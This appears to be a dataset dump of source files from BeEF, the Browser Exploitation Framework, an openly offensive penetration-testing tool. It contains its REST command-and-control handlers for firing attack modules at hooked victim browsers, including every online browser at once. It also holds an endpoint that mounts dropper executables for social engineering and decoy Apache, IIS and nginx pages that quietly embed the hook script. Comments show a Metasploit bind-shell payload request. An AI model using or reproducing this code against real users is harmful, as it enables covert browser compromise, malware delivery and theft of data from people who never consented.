language
stringlengths 0
24
| filename
stringlengths 9
214
| code
stringlengths 99
9.93M
|
---|---|---|
Ruby | beef/core/main/rest/handlers/modules.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Modules < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 unless BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
#
# @note Get all available and enabled modules (id, name, category)
#
get '/' do
mods = BeEF::Core::Models::CommandModule.all
mods_hash = {}
i = 0
mods.each do |mod|
modk = BeEF::Module.get_key_by_database_id(mod.id)
next unless BeEF::Module.is_enabled(modk)
mods_hash[i] = {
'id' => mod.id,
'class' => config.get("beef.module.#{modk}.class"),
'name' => config.get("beef.module.#{modk}.name"),
'category' => config.get("beef.module.#{modk}.category")
}
i += 1
end
mods_hash.to_json
end
get '/search/:mod_name' do
mod = BeEF::Core::Models::CommandModule.where(name: params[:mod_name]).first
result = {}
result = { 'id' => mod.id } unless mod.nil?
result.to_json
end
#
# @note Get the module definition (info, options)
#
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.find(params[:mod_id])
error 404 if cmd.nil?
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 if modk.nil?
# TODO: check if it's possible to also retrieve the TARGETS supported
{
'name' => cmd.name,
'description' => config.get("beef.module.#{cmd.name}.description"),
'category' => config.get("beef.module.#{cmd.name}.category"),
'options' => BeEF::Module.get_options(modk) # TODO: => get also payload options..get_payload_options(modk,text)
}.to_json
end
# @note Get the module result for the specific executed command
#
# Example with the Alert Dialog
# GET /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86/1?token=0a931a461d08b86bfee40df987aad7e9cfdeb050 HTTP/1.1
# Host: 127.0.0.1:3000
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
#
# {"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
#
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.where(session: params[:session]).first
error 401 if hb.nil?
cmd = BeEF::Core::Models::Command.where(hooked_browser_id: hb.id,
command_module_id: params[:mod_id], id: params[:cmd_id]).first
error 404 if cmd.nil?
results = BeEF::Core::Models::Result.where(hooked_browser_id: hb.id, command_id: cmd.id)
error 404 if results.nil?
results_hash = {}
i = 0
results.each do |result|
results_hash[i] = {
'date' => result.date,
'data' => result.data
}
i += 1
end
results_hash.to_json
end
#
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
#
# +++ Example with the Alert Dialog: +++
# POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
# Host: 127.0.0.1:3000
# Content-Type: application/json; charset=UTF-8
# Content-Length: 18
#
# {"text":"michele"}
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
# Content-Length: 35
#
# {"success":"true","command_id":"1"}
#
# +++ Example with a Metasploit module (Adobe FlateDecode Stream Predictor 02 Integer Overflow) +++
# +++ note that in this case we cannot query BeEF/Metasploit if module execution was successful or not.
# +++ this is why there is "command_id":"not_available" in the response
# POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/236?token=83f13036060fd7d92440432dd9a9b5e5648f8d75 HTTP/1.1
# Host: 127.0.0.1:3000
# Content-Type: application/json; charset=UTF-8
# Content-Length: 81
#
# {"SRVPORT":"3992", "URIPATH":"77345345345dg", "PAYLOAD":"generic/shell_bind_tcp"}
#===response (snip)===
# HTTP/1.1 200 OK
# Content-Type: application/json; charset=UTF-8
# Content-Length: 35
#
# {"success":"true","command_id":"not_available"}
#
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.where(session: params[:session]).first
error 401 if hb.nil?
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 if modk.nil?
request.body.rewind
begin
data = JSON.parse request.body.read
options = []
data.each { |k, v| options.push({ 'name' => k, 'value' => v }) }
exec_results = BeEF::Module.execute(modk, params[:session], options)
exec_results.nil? ? '{"success":"false"}' : '{"success":"true","command_id":"' + exec_results.to_s + '"}'
rescue StandardError
print_error "Invalid JSON input for module '#{params[:mod_id]}'"
error 400 # Bad Request
end
end
#
# @note Fire a new command module to multiple hooked browsers.
# Returns the command IDs of the launched module, or 0 if firing got issues.
# Use "hb_ids":["ALL"] to run on all hooked browsers
# Use "hb_ids":["ALL_ONLINE"] to run on all hooked browsers currently online
#
# POST request body example (for modules that don't need parameters, just remove "mod_params")
# {
# "mod_id":1,
# "mod_params":{
# "question":"are you hooked?"
# },
# "hb_ids":[1,2]
# }
#
# response example: {"1":16,"2":17}
#
# curl example (alert module with custom text, 2 hooked browsers)):
#
# curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
#-X POST http://127.0.0.1:3000/api/modules/multi_browser?token=2316d82702b83a293e2d46a0886a003a6be0a633
#
post '/multi_browser' do
request.body.rewind
begin
body = JSON.parse request.body.read
modk = BeEF::Module.get_key_by_database_id body['mod_id']
error 404 if modk.nil?
mod_params = []
unless body['mod_params'].nil?
body['mod_params'].each do |k, v|
mod_params.push({ 'name' => k, 'value' => v })
end
end
hb_ids = body['hb_ids']
results = {}
# run on all hooked browsers currently online?
if hb_ids.first =~ /\Aall_online\z/i
hb_ids = []
BeEF::Core::Models::HookedBrowser.where(
:lastseen.gte => (Time.new.to_i - 15)
).each { |hb| hb_ids << hb.id }
# run on all hooked browsers?
elsif hb_ids.first =~ /\Aall\z/i
hb_ids = []
BeEF::Core::Models::HookedBrowser.all.each { |hb| hb_ids << hb.id }
end
# run modules
hb_ids.each do |hb_id|
hb = BeEF::Core::Models::HookedBrowser.find(hb_id)
if hb.nil?
results[hb_id] = 0
next
else
cmd_id = BeEF::Module.execute(modk, hb.session, mod_params)
results[hb_id] = cmd_id
end
end
results.to_json
rescue StandardError
print_error 'Invalid JSON input passed to endpoint /api/modules/multi_browser'
error 400 # Bad Request
end
end
# @note Fire multiple command modules to a single hooked browser.
# Returns the command IDs of the launched modules, or 0 if firing got issues.
#
# POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
# { "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
# "modules": [
# { # test_return_long_string module with custom input
# "mod_id":99,
# "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
# },
# { # prompt_dialog module with custom input
# "mod_id":116,
# "mod_input":[{"question":"hooked?"}]
# },
# { # alert_dialog module without input (using default input, if any)
# "mod_id":128,
# "mod_input":[]
# }
# ]
# }
# response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
#
# curl example (test_return_long_string and prompt_dialog module with custom inputs)):
#
# curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
# "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
# -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
#
post '/multi_module' do
request.body.rewind
begin
body = JSON.parse request.body.read
hb = BeEF::Core::Models::HookedBrowser.where(session: body['hb']).first
error 401 if hb.nil?
results = {}
unless body['modules'].nil?
body['modules'].each do |mod|
mod_id = mod['mod_id']
mod_k = BeEF::Module.get_key_by_database_id mod['mod_id']
if mod_k.nil?
results[mod_id] = 0
next
else
mod_params = []
mod['mod_input'].each do |input|
input.each do |k, v|
mod_params.push({ 'name' => k, 'value' => v })
end
end
cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
results[mod_id] = cmd_id
end
end
end
results.to_json
rescue StandardError
print_error 'Invalid JSON input passed to endpoint /api/modules/multi'
error 400 # Bad Request
end
end
end
end
end
end |
Ruby | beef/core/main/rest/handlers/server.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Server < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
http_server = BeEF::Core::Server.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 unless BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Binds a local file to a specified path in BeEF's web server
# Note: 'local_file' expects a file from the /extensions/social_engineering/droppers directory.
# Example usage:
# curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mount":"/dropper","local_file":"dropper.exe"}'
# -X POST -v http://10.0.60.10/api/server/bind?token=xyz
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
droppers_dir = "#{File.expand_path(__dir__)}/../../../../extensions/social_engineering/droppers/"
if File.exist?(droppers_dir + local_file) && Dir.entries(droppers_dir).include?(local_file)
f_ext = File.extname(local_file).gsub('.', '')
f_ext = nil if f_ext.empty?
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind("/extensions/social_engineering/droppers/#{local_file}", mount, f_ext)
status 200
else
halt 400
end
rescue StandardError
error 400
end
end
get '/mounts' do
{ 'mounts' => http_server.mounts }.to_json
end
get '/version' do
{ 'version' => config.get('beef.version') }.to_json
end
end
end
end
end |
Ruby | beef/core/main/router/api.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Router
module RegisterRouterHandler
def self.mount_handler(server)
server.mount('/', BeEF::Core::Router::Router.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
end
end
end |
Ruby | beef/core/main/router/router.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Router
# @note This is the main Router parent class.
# @note All the HTTP handlers registered on BeEF will extend this class.
class Router < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do
set :show_exceptions, false
end
# @note Override default 404 HTTP response
not_found do
error_page_404
end
before do
# @note Override Server HTTP response header
headers response_headers
# @note If CORS is enabled, expose the appropriate headers
if config.get('beef.http.restful_api.allow_cors')
allowed_domains = config.get('beef.http.restful_api.cors_allowed_domains')
if allowed_domains
headers 'Access-Control-Allow-Origin' => allowed_domains
end
headers 'Access-Control-Allow-Methods' => 'POST, GET'
# Responses to preflight OPTIONS requests need to respond with HTTP 200
# and be able to handle requests with a JSON content-type
if request.request_method == 'OPTIONS'
headers 'Access-Control-Allow-Headers' => 'Content-Type'
halt 200
end
end
end
# @note Default root page
get '/' do
index_page
end
private
def response_headers
config = BeEF::Core::Configuration.instance
default_headers = {
'Server' => '',
'Content-Type' => 'text/html'
}
return default_headers unless config.get('beef.http.web_server_imitation.enable')
case config.get('beef.http.web_server_imitation.type')
when 'apache'
{
'Server' => 'Apache/2.2.3 (CentOS)',
'Content-Type' => 'text/html; charset=UTF-8'
}
when 'iis'
{
'Server' => 'Microsoft-IIS/6.0',
'X-Powered-By' => 'ASP.NET',
'Content-Type' => 'text/html; charset=UTF-8'
}
when 'nginx'
{
'Server' => 'nginx',
'Content-Type' => 'text/html'
}
else
print_error 'Configuration error in beef.http.web_server_imitation.type!'
print_more 'Supported values are: apache, iis, nginx.'
default_headers
end
end
def index_page
config = BeEF::Core::Configuration.instance
return '' unless config.get('beef.http.web_server_imitation.enable')
bp = config.get 'beef.extension.admin_ui.base_path'
case config.get('beef.http.web_server_imitation.type')
when 'apache'
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">' \
'<head>' \
'<title>Apache HTTP Server Test Page powered by CentOS</title>' \
'<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />' \
'<style type="text/css">' \
'body {' \
'background-color: #fff; ' \
'color: #000;' \
'font-size: 0.9em;' \
'font-family: sans-serif,helvetica;' \
'margin: 0;' \
'padding: 0; ' \
'} ' \
':link { ' \
'color: #0000FF; ' \
'} ' \
':visited { ' \
'color: #0000FF; ' \
'} ' \
'a:hover { ' \
'color: #3399FF; ' \
'} ' \
'h1 { ' \
"\ttext-align: center; " \
"\tmargin: 0; " \
"\tpadding: 0.6em 2em 0.4em; " \
"\tbackground-color: #3399FF;" \
"\tcolor: #ffffff; " \
"\tfont-weight: normal; " \
"\tfont-size: 1.75em; " \
"\tborder-bottom: 2px solid #000; " \
'} ' \
'h1 strong {' \
'font-weight: bold; ' \
'} ' \
'h2 { ' \
"\tfont-size: 1.1em;" \
'font-weight: bold; ' \
'} ' \
'.content { ' \
"\tpadding: 1em 5em; " \
'} ' \
'.content-columns { ' \
"\t/* Setting relative positioning allows for " \
"\tabsolute positioning for sub-classes */ " \
"\tposition: relative; " \
"\tpadding-top: 1em; " \
'} ' \
'.content-column-left { ' \
"\t/* Value for IE/Win; will be overwritten for other browsers */" \
"\twidth: 47%; " \
"\tpadding-right: 3%; " \
"\tfloat: left; " \
"\tpadding-bottom: 2em; " \
'} ' \
'.content-column-right { ' \
"\t/* Values for IE/Win; will be overwritten for other browsers */" \
"\twidth: 47%; " \
"\tpadding-left: 3%; " \
"\tfloat: left; " \
"\tpadding-bottom: 2em; " \
'} ' \
'.content-columns>.content-column-left, .content-columns>.content-column-right {' \
"\t/* Non-IE/Win */" \
'} ' \
'img { ' \
"\tborder: 2px solid #fff; " \
"\tpadding: 2px; " \
"\tmargin: 2px; " \
'} ' \
'a:hover img { ' \
"\tborder: 2px solid #3399FF; " \
'} ' \
'</style> ' \
'</head> ' \
'<body> ' \
'<h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>' \
'<div class="content"><div class="content-middle">' \
'<p>This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page it means that the Apache HTTP server installed at this site is working properly.</p>' \
'</div>' \
'<hr />' \
'<div class="content-columns">' \
'<div class="content-column-left"> ' \
'<h2>If you are a member of the general public:</h2>' \
'<p>The fact that you are seeing this page indicates that the website you just visited is either experiencing problems or is undergoing routine maintenance.</p>' \
"<p>If you would like to let the administrators of this website know that you've seen this page instead of the page you expected, you should send them e-mail. In general, mail sent to the name \"webmaster\" and directed to the website's domain should reach the appropriate person.</p> " \
'<p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "[email protected]".</p>' \
'</div>' \
'<div class="content-column-right">' \
'<h2>If you are the website administrator:</h2>' \
'<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>' \
'<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>' \
"<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" \
'</div>' \
'</div>' \
'</div>' \
' <div class="content">' \
'<div class="content-middle"><h2>About CentOS:</h2><b>The Community ENTerprise Operating System</b> (CentOS) is an Enterprise-class Linux Distribution derived from sources freely provided to the public by a prominent North American Enterprise Linux vendor. CentOS conforms fully with the upstream vendors redistribution policy and aims to be 100% binary compatible. (CentOS mainly changes packages to remove upstream vendor branding and artwork.) The CentOS Project is the organization that builds CentOS.</p>' \
'<p>For information on CentOS please visit the <a href="http://www.centos.org/">CentOS website</a>.</p>' \
'<p><h2>Note:</h2><p>CentOS is an Operating System and it is used to power this website; however, the webserver is owned by the domain owner and not the CentOS Project. <b>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project.</b>' \
"<p>Unless this server is on the CentOS.org domain, the CentOS Project doesn't have anything to do with the content on this webserver or any e-mails that directed you to this site.</p> " \
'<p>For example, if this website is www.example.com, you would find the owner of the example.com domain at the following WHOIS server:</p>' \
'<p><a href="http://www.internic.net/whois.html">http://www.internic.net/whois.html</a></p>' \
'</div>' \
'</div>' +
("<script src='#{config.get('beef.http.hook_file')}'></script>" if config.get('beef.http.web_server_imitation.hook_root')).to_s +
'</body>' \
'</html>'
when 'iis'
'<html>' \
'<head>' \
'<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">' \
'<title ID=titletext>Under Construction</title>' \
'</head>' \
'<body bgcolor=white>' \
'<table>' \
'<tr>' \
'<td ID=tableProps width=70 valign=top align=center>' \
"<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" \
'<td ID=tablePropsWidth width=400>' \
'<h1 ID=errortype style="font:14pt/16pt verdana; color:#4e4e4e">' \
'<P ID=Comment1><!--Problem--><P ID="errorText">Under Construction</h1>' \
'<P ID=Comment2><!--Probable causes:<--><P ID="errordesc"><font style="font:9pt/12pt verdana; color:black">' \
'The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured.' \
'<P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator.' \
'<hr size=1 color="blue">' \
'<P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see "Enabling and Disabling Dynamic Content" in IIS Help.' \
'<h5 ID=head1>To access IIS Help</h5>' \
'<ol>' \
'<li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>.' \
'<li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears.' \
'<li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>.' \
'<li ID=bullet4>Click <b>Internet Information Services</b>.</ol>' \
'</td>' \
'</tr>' \
'</table>' +
("<script src='#{config.get('beef.http.hook_file')}'></script>" if config.get('beef.http.web_server_imitation.hook_root')).to_s +
'</body>' \
'</html>'
when 'nginx'
"<!DOCTYPE html>\n" \
"<html>\n" \
"<head>\n" \
"<title>Welcome to nginx!</title>\n" \
"<style>\n" \
" body {\n" \
" width: 35em;\n" \
" margin: 0 auto;\n" \
" font-family: Tahoma, Verdana, Arial, sans-serif;\n" \
" }\n" \
"</style>\n" \
"</head>\n" \
"<body>\n" \
"<h1>Welcome to nginx!</h1>\n" \
"<p>If you see this page, the nginx web server is successfully installed and\n" \
"working. Further configuration is required.</p>\n\n" \
"<p>For online documentation and support please refer to\n" \
"<a href=\"http://nginx.org/\">nginx.org</a>.<br/>\n" \
"Commercial support is available at\n" \
"<a href=\"http://nginx.com/\">nginx.com</a>.</p>\n\n" \
"<p><em>Thank you for using nginx.</em></p>\n" +
("<script src='#{config.get('beef.http.hook_file')}'></script>" if config.get('beef.http.web_server_imitation.hook_root')).to_s +
"</body>\n" \
"</html>\n"
else
print_error 'Configuration error in beef.http.web_server_imitation.type!'
print_more 'Supported values are: apache, iis, nginx.'
''
end
end
def error_page_404
config = BeEF::Core::Configuration.instance
return 'Not Found.' unless config.get('beef.http.web_server_imitation.enable')
case config.get('beef.http.web_server_imitation.type')
when 'apache'
return <<-EOF
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS)</address>
#{("<script src='#{config.get('beef.http.hook_file')}'></script>" if config.get('beef.http.web_server_imitation.hook_404'))}
</body></html>
EOF
when 'iis'
return <<-EOF
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messa
</ul>
</TD></TR></TABLE>
#{("<script src='#{config.get('beef.http.hook_file')}'></script>" if config.get('beef.http.web_server_imitation.hook_404'))}
</BODY></HTML>
EOF
when 'nginx'
return <<-EOF
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
#{("<script src='#{config.get('beef.http.hook_file')}'></script>" if config.get('beef.http.web_server_imitation.hook_404'))}
</body>
</html>
EOF
else
print_error 'Configuration error in beef.http.web_server_imitation.type!'
print_more 'Supported values are: apache, iis, nginx.'
'Not Found.'
end
end
end
end
end
end |
Ruby | beef/core/ruby/hash.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Hash
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined
# in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a?(Hash) && self[key].is_a?(Hash)
target[key] = target[key].deep_merge hash[key]
next
end
target[key] = hash[key]
end
target
end
end |
Ruby | beef/core/ruby/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Module
# Returns the classes in the current ObjectSpace where this module has been mixed in according to Module#included_modules.
# @return [Array] An array of classes
def included_in_classes
classes = []
ObjectSpace.each_object(Class) { |k| classes << k if k.included_modules.include?(self) }
classes.reverse.each_with_object([]) do |klass, unique_classes|
unique_classes << klass unless unique_classes.collect { |k| k.to_s }.include?(klass.to_s)
end
end
# Returns the modules in the current ObjectSpace where this module has been mixed in according to Module#included_modules.
# @return [Array] An array of modules
def included_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.included_modules.include?(self) }
modules.reverse.each_with_object([]) do |klass, unique_modules|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
end
end
end |
Ruby | beef/core/ruby/print.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Function used to print errors to the console
# @param [String] s String to be printed
def print_error(s)
puts Time.now.localtime.strftime('[%k:%M:%S]') + '[!]' + ' ' + s.to_s
BeEF.logger.error s.to_s
end
# Function used to print information to the console
# @param [String] s String to be printed
def print_info(s)
puts Time.now.localtime.strftime('[%k:%M:%S]') + '[*]' + ' ' + s.to_s
BeEF.logger.info s.to_s
end
# Function used to print information to the console (wraps print_info)
# @param [String] s String to be printed
def print_status(s)
print_info(s)
end
# Function used to print warning information
# @param [String] s String to be printed
def print_warning(s)
puts Time.now.localtime.strftime('[%k:%M:%S]') + '[!]' + ' ' + s.to_s
BeEF.logger.warn s.to_s
end
# Function used to print debug information
# @param [String] s String to be printed
# @note This function will only print messages if the debug flag is set to true
def print_debug(s)
config = BeEF::Core::Configuration.instance
return unless config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
puts Time.now.localtime.strftime('[%k:%M:%S]') + '[>]' + ' ' + s.to_s
BeEF.logger.debug s.to_s
end
# Function used to print successes to the console
# @param [String] s String to be printed
def print_success(s)
puts Time.now.localtime.strftime('[%k:%M:%S]') + '[+]' + ' ' + s.to_s
BeEF.logger.info s.to_s
end
# Function used to print successes to the console (wraps print_success)
# @param [String] s String to be printed
def print_good(s)
print_success(s)
end
# Print multiple lines with decoration split by the return character
# @param [String] s String to be printed
# @note The string passed needs to be separated by the "\n" for multiple lines to be printed
def print_more(s)
time = Time.now.localtime.strftime('[%k:%M:%S]')
lines = if s.instance_of?(Array)
s
else
s.split("\n")
end
lines.each_with_index do |line, index|
if (index + 1) == lines.size
puts "#{time} |_ #{line}"
BeEF.logger.info "#{time} |_ #{line}"
else
puts "#{time} | #{line}"
BeEF.logger.info "#{time} | #{line}"
end
end
end
# Function used to print over the current line
# @param [String] s String to print over current line
# @note To terminate the print_over functionality your last print_over line must include a "\n" return
def print_over(s)
time = Time.now.localtime.strftime('[%k:%M:%S]')
print "\r#{time}" + '[*]'.blue + " #{s}"
BeEF.logger.info s.to_s
end |
Ruby | beef/core/ruby/security.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# @note Prevent exec from ever being used
def exec(_args)
puts 'For security reasons the exec method is not accepted in the Browser Exploitation Framework code base.'
exit
end
# @note Prevent system from ever being used
def system(_args)
puts 'For security reasons the system method is not accepted in the Browser Exploitation Framework code base.'
exit
end
# @note Prevent Kernel.system from ever being used
def Kernel.system(_args)
puts 'For security reasons the Kernel.system method is not accepted in the Browser Exploitation Framework code base.'
exit
end |
Ruby | beef/core/ruby/string.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class String
# @note Use a gem to colorize the console.
# @note http://flori.github.com/term-ansicolor/
include Term::ANSIColor
end |
beef/doc/boilerplate | Copyright (c) 2006-2023 Wade Alcorn - [email protected]
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission |
|
beef/doc/COPYING | COPYING -- Describes the terms under which the Browser Exploitation
Framework (BeEF) is distributed. A copy of the GNU General Public License
(GPL) is appended to this file.
BeEF (Browser Exploitation Framework) is (C) 2006-2020 Wade Alcorn.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; Version 2 with the clarifications and exceptions
described below. This guarantees your right to use, modify, and
redistribute this software under certain conditions. If you wish to embed
BeEF technology into proprietary software, we sell alternative licenses
(contact [email protected]).
Note that the GPL places important restrictions on "derived works", yet it
does not provide a detailed definition of that term. To avoid
misunderstandings, we interpret that term as broadly as copyright law
allows. For example, we consider an application to constitute a "derived
work" for the purpose of this license if it does any of the following:
* Integrates source code from BeEF.
* Reads or includes BeEF copyrighted hook, core components, tests, modules
or extensions.
* Executes BeEF and parses the results.
* Integrates/includes/aggregates BeEF into a proprietary executable
installer, such as those produced by InstallShield.
* Links to a library or executes a program that does any of the above
The term "BeEF" should be taken to also include any portions or derived
works of BeEF. This list is not exclusive, but is meant to clarify our
interpretation of derived works with some common examples. Our
interpretation applies only to BeEF - we do not speak for other people's
GPL works.
If you have any questions about the GPL licensing restrictions on using
BeEF in non-GPL works, we would be happy to help. As mentioned above,
we also offer alternative license to integrate BeEF into proprietary
applications and appliances.
If you received these files with a written license agreement or contract
stating terms other than the terms above, then that alternative license
agreement takes precedence over these comments.
Source is provided to this software because we believe users have a right
to know exactly what a program is going to do before they run it.
Source code also allows you to fix bugs and add new features. You are
highly encouraged to send your changes to [email protected] for possible
incorporation into the main distribution. By sending these changes to the
BeEF developers, to the mailing lists, or via Git pull request, checking
them into the BeEF source code repository, it is understood (unless you
specify otherwise) that you are offering the BeEF project the unlimited,
non-exclusive right to reuse, modify, and relicense the code. BeEF will
always be available Open Source, but this is important because the
inability to relicense code has caused devastating problems for other Free
Software projects (such as KDE and NASM). If you wish to specify special
license conditions of your contributions, just say so when you send them.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License v2.0 for more details at
http://www.gnu.org/licenses/gpl-2.0.html, or below
****************************************************************************
GNU GENERAL PUBLIC LICENSE
